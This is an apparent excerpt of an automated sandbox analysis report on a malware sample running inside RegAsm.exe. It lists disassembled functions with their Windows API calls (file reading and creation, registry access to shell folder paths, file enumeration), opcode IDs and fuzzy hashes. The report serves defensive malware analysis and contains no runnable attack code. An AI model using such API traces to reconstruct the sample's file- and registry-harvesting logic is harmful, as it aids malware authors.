                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??3@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFind
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                  Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                  Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                  • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                  • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                  Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                  • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                  Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                  • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                  Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                  • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                  Download Yara Rule
